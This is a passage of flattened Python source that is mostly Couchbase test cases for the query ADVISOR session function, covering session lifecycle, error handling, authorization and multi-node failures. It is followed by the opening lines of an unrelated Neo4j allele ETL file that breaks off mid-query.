queries_count[query['statement']] = query['run_count']
self.assertEqual(queries_count[query_lyon], 3)
self.assertEqual(queries_count[query_grenoble], 2)
self.assertEqual(queries_count[query_nice], 1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_skip_statement(self):
"""
        Non-advisable statements (EXPLAIN, ADVISE, SELECT ADVISOR, PREPARE, EXECUTE) should
        not show up in the session advice.
"""
explain_query = 'EXPLAIN SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
advisor_list_query = "SELECT ADVISOR ({'action': 'list'})"
advise_query = 'ADVISE SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
prepare_query = 'PREPARE aeroport_de_lyon AS SELECT airportname FROM `travel-sample`.`inventory`.`airport` WHERE lower(city) = "lyon" AND country = "France"'
execute_prepared_query = 'EXECUTE aeroport_de_lyon'
# For prepare statement
self.run_cbq_query("CREATE PRIMARY INDEX ON `default`:`default`")
# Start session
start = self.run_cbq_query("SELECT ADVISOR({'action': 'start', 'duration': '45m'})")
session = start['results'][0]['$1']['session']
# Run queries. Explain, advisor, advise, prepare and execute should not show up in session advise.
self.run_cbq_query(explain_query)
self.run_cbq_query(advise_query)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(prepare_query)
self.run_cbq_query(execute_prepared_query)
# Stop and check session
self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop")
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get")
# Check there are no errors statement in advise session
advise = get['results'][0]['Get'][0][0]
self.assertEqual(advise, [])
def test_session_skip_count(self):
"""
        Non-advisable statements should
not be counted toward query_count.
Only query_lyon should be counted.
"""
advisor_list_query = "SELECT ADVISOR ({'action': 'list'})"
explain_query = 'EXPLAIN SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
advise_query = 'ADVISE SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
prepare_query = 'PREPARE aeroport_de_lyon AS SELECT airportname FROM `travel-sample`.`inventory`.`airport` WHERE lower(city) = "lyon" AND country = "France"'
execute_prepared_query = 'EXECUTE aeroport_de_lyon'
update_stats_query = 'UPDATE STATISTICS FOR `travel-sample`.inventory.airport(city)'
create_scope = "CREATE SCOPE `travel-sample`.scope1"
drop_scope = "DROP SCOPE `travel-sample`.scope1"
create_collection = "CREATE COLLECTION `travel-sample`.inventory.collection1"
drop_collection = "DROP COLLECTION `travel-sample`.inventory.collection1"
query_lyon='SELECT airportname FROM `travel-sample` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
# Start session
start = self.run_cbq_query("SELECT ADVISOR({'action': 'start', 'duration': '45m', 'query_count': 2})")
session = start['results'][0]['$1']['session']
# Run queries
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(prepare_query)
self.run_cbq_query(advise_query)
self.run_cbq_query(update_stats_query)
self.run_cbq_query(create_scope)
self.run_cbq_query(create_collection)
# First execution of query
self.run_cbq_query(query_lyon)
self.run_cbq_query(advisor_list_query)
self.run_cbq_query(execute_prepared_query)
self.run_cbq_query(explain_query)
self.run_cbq_query(drop_scope)
self.run_cbq_query(drop_collection)
# Second execution of query
self.run_cbq_query(query_lyon)
# Stop and check session
self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop")
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get")
# Check the query_lyon ran 2 times
advise = get['results'][0]['Get'][0][0]
statements = advise['recommended_covering_indexes'][0]['statements']
self.assertEqual(statements[0]['statement'], query_lyon)
self.assertEqual(statements[0]['run_count'], 2)
def test_get_active_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Get session
get = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}}) as Get".format(session), server=self.master)
self.assertEqual(get['results'][0]['Get'], [])
# Abort session
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_query_syntax_error(self):
query_syntax = f'SELECT airportname FROM `{self.bucket_name}` WERE type = \\"airport\\"'
error = "syntax error - line 1, column 53, near '`travel-sample` WERE', at: type"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR(\"{query_syntax}\") as Advisor", server=self.master)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["error"], error)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["run_count"], 1)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["statement"], query_syntax.replace('\\',''))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_invalid_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'duration': '10s', 'invalid': 10});"
error_message = "Advisor: Invalid arguments."
error_code = 10503
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error_message))
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], error_code)
self.assertEqual(error['msg'], error_message)
else:
self.fail("There were no errors. Error expected: {0}".format(error_message))
def test_negative_missing_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'response': '10s'});"
error = "Error evaluating projection - cause: advisor() not valid argument for 'duration'"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_array(self):
query=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
error = "Number of arguments to function ADVISOR (near line 1, column 14) must be 1."
try:
results = self.run_cbq_query(query=f"SELECT ADVISOR('{query}','{query}')", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_value(self):
invalid_actions = [ \
{'cmd': {'action':'start', 'duration':'two'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: invalid duration "two"'}, \
{'cmd': {'action':'start', 'duration':'1hr'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: unknown unit "hr" in duration "1hr"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'nul'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: invalid duration "nul"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'1sec'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: time: unknown unit "sec" in duration "1sec"'}, \
{'cmd': {'action':'start', 'duration':'1h', 'query_count':'ten'}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: advisor() not valid argument for \'query_count\''}, \
{'cmd': {'action':'start', 'duration':'1h', 'profile':9999}, 'error_code': 5010, 'error_msg': 'Error evaluating projection - cause: advisor() not valid argument for \'profile\''} ]
for action in invalid_actions:
try:
self.run_cbq_query(query=f"SELECT ADVISOR({action['cmd']})", server=self.master)
self.fail(f"There were no errors. Error expected: {action['error_msg']}")
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], action['error_code'])
self.assertEqual(error['msg'], action['error_msg'] )
def test_negative_list(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'status'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'stopped'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_session(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'session'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'get'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_session(self):
error = "Error evaluating projection - cause: advisor() not valid argument for 'session'"
for action in ['get','purge','stop','abort']:
try:
session = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'{action}', 'session':123456}})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_from(self):
error_code = 3256
error_message = "FROM clause is not allowed when Advisor function is present in projection clause."
advisor_query = "select ADVISOR({'action':'list'}) FROM `trave-sample` WHERE city = 'Lyon'"
try:
self.run_cbq_query(advisor_query)
except CBQError as ex:
error = self.process_CBQE(ex)
self.assertEqual(error['code'], error_code)
self.assertEqual(error['msg'], error_message)
def run_async_query(self, query, username, password, server):
results = self.run_cbq_query(query=query, username=username, password=password, server=server)
# Check the query has been cancelled
self.assertEqual(results['status'], "stopped")
def test_session_query_cancel(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.users = [{"id": "jimDoe", "name": "Jim Downing", "password": "password1"}]
self.create_users()
role = "admin"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} to {user_id}",server=self.master)
cancel_query = f"DELETE FROM system:active_requests WHERE users = '{user_id}'"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
th = threading.Thread(target=self.run_async_query,args=(long_query, user_id, user_pwd, self.master))
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Spawn query in a thread
th.start()
# Cancel query
self.sleep(1)
cancel = self.run_cbq_query(query=cancel_query,username=user_id, password=user_pwd, server=self.master)
th.join()
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_query_timeout(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
try:
results = self.run_cbq_query(query=long_query, query_params={'timeout':'500ms'}, server=self.master)
except CBQError as ex:
self.assertTrue(str(ex).find("Timeout 500ms exceeded") > 0)
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_collection(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `default`:`travel-sample`.`inventory`.`airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `default`:`travel-sample`.`inventory`.`airport`(`country`,lower(`city`))"
query1=f'SELECT airportname FROM `{self.bucket_name}`.inventory.airport WHERE lower(city) = "lyon" AND country = "France"'
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='airport', index='def_inventory_airport_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_collection_context(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `airport`(`country`,lower(`city`))"
query1='SELECT airportname FROM airport WHERE lower(city) = "lyon" AND country = "France"'
query_contexts = ["", f"default:`{self.bucket_name}`.inventory", f"default:`{self.bucket_name}`._default"]
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='airport', index='def_inventory_airport_primary')
for context in query_contexts:
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", query_context=context, server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, query_context=f"default:`{self.bucket_name}`.inventory", server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", query_context=context, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", query_context=context, server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_collection_join(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, query_context=f"default:`{self.bucket_name}`.inventory", server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_negative_authorization(self):
self.users = [{"id": "jackDoe", "name": "Jack Downing", "password": "password1"}]
self.create_users()
role = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} on `{self.bucket_name}` to {user_id}",server=self.master)
sessions_queries = ["SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", "SELECT ADVISOR({'action': 'list', 'status': 'all'})"]
error = "User does not have credentials to run queries accessing the system tables. Add role query_system_catalog to allow the query to run."
for query in sessions_queries:
try:
results = self.run_cbq_query(query=query, username=user_id, password=user_pwd, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_authorization(self):
self.users = [{"id": "janneDoe", "name": "Janne Downing", "password": "password1"}]
self.create_users()
role_ctlg = "query_system_catalog"
role_qury = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant_ctlg = self.run_cbq_query(query=f"GRANT {role_ctlg} to {user_id}",server=self.master)
grant_qury = self.run_cbq_query(query=f"GRANT {role_qury} on `{self.bucket_name}` to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
# Start session as authorized user
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", username=user_id, password=user_pwd, server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
results = self.run_cbq_query(query=query1, server=self.master)
self.sleep(2)
# Stop and get session advise as authorized user
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", username=user_id, password=user_pwd, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", username=user_id, password=user_pwd, server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
# Purge and list sessions as authorized user
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'purge', 'session': '{session}'}})", username=user_id, password=user_pwd, server=self.master)
sessions = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", username=user_id, password=user_pwd, server=self.master)
self.assertEqual(sessions['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_authorization_other(self):
self.users = [{"id": "jeanDoe", "name": "Jean Downing", "password": "password1"}]
self.create_users()
role_ctlg = "query_system_catalog"
role_qury = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant_ctlg = self.run_cbq_query(query=f"GRANT {role_ctlg} to {user_id}",server=self.master)
grant_qury = self.run_cbq_query(query=f"GRANT {role_qury} on `{self.bucket_name}` to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
# Start session as current user
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Run query as current user
results = self.run_cbq_query(query=query1, server=self.master)
self.sleep(2)
# Stop and get session advise as authorized user
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", username=user_id, password=user_pwd, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", username=user_id, password=user_pwd, server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
# Purge and list sessions as authorized user
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'purge', 'session': '{session}'}})", username=user_id, password=user_pwd, server=self.master)
sessions = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", username=user_id, password=user_pwd, server=self.master)
self.assertEqual(sessions['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_delete_completed_req(self):
advise_index1 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Delete completed requests
delete = self.run_cbq_query(query=f"DELETE FROM system:completed_requests", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
advise = get['results'][0]['Get'][0]
self.assertEqual(advise, [[]])
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_drop_collection(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Drop collection
drop_collection = self.run_cbq_query(query="DROP COLLECTION `travel-sample`.`inventory`.`landmark`", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_drop_scope(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Drop scope
drop_scope = self.run_cbq_query(query="DROP SCOPE `travel-sample`.`inventory`", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_kill_index(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node1
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node1)
session = start['results'][0]['$1']['session']
# Run query on node1
results = self.run_cbq_query(query=query1, server=node1)
# Kill index service on node1
remote_client = RemoteMachineShellConnection(node1)
remote_client.terminate_process(process_name="indexer")
self.sleep(3)
# Stop session on node2
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node2)
# Get session on node1
self.sleep(2)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=node1)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
self.assertEqual(index['statements'][0]['run_count'], 1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_kill_query(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node2
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node2)
session = start['results'][0]['$1']['session']
# Run query on node2
results = self.run_cbq_query(query=query1, server=node2)
# Kill n1ql service on node2
remote_client = RemoteMachineShellConnection(node2)
remote_client.terminate_process(process_name="cbq-engine")
self.sleep(3)
# Stop session on node1
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node1)
# List session
self.sleep(1)
list_node1 = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'list'}}) as List", server=node1)
statement1 = list_node1['results'][0]['List'][0]['tasks_cache']['results'][0]['recommended_indexes'][0]['statements'][0]['statement']
# Check advise
self.assertEqual(statement1, query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_multi_node(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node1
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node1)
session = start['results'][0]['$1']['session']
# Run query on node2
results = self.run_cbq_query(query=query1, server=node2)
# Run query on node1
results = self.run_cbq_query(query=query1, server=node1)
# Stop session on node1
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node1)
# Get session on node2
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=node2)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
self.assertEqual(index['statements'][0]['run_count'], 2)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
|
allele_etl.py
|
"""Allele ETL."""
import logging
import multiprocessing
import uuid
from etl import ETL
from etl.helpers import ETLHelper
from etl.helpers import TextProcessingHelper
from files import JSONFile
from transactors import CSVTransactor, Neo4jTransactor
logger = logging.getLogger(__name__)
class AlleleETL(ETL):
"""Call AlleleETL."""
allele_construct_no_gene_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (c:Construct {primaryKey: row.constructId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
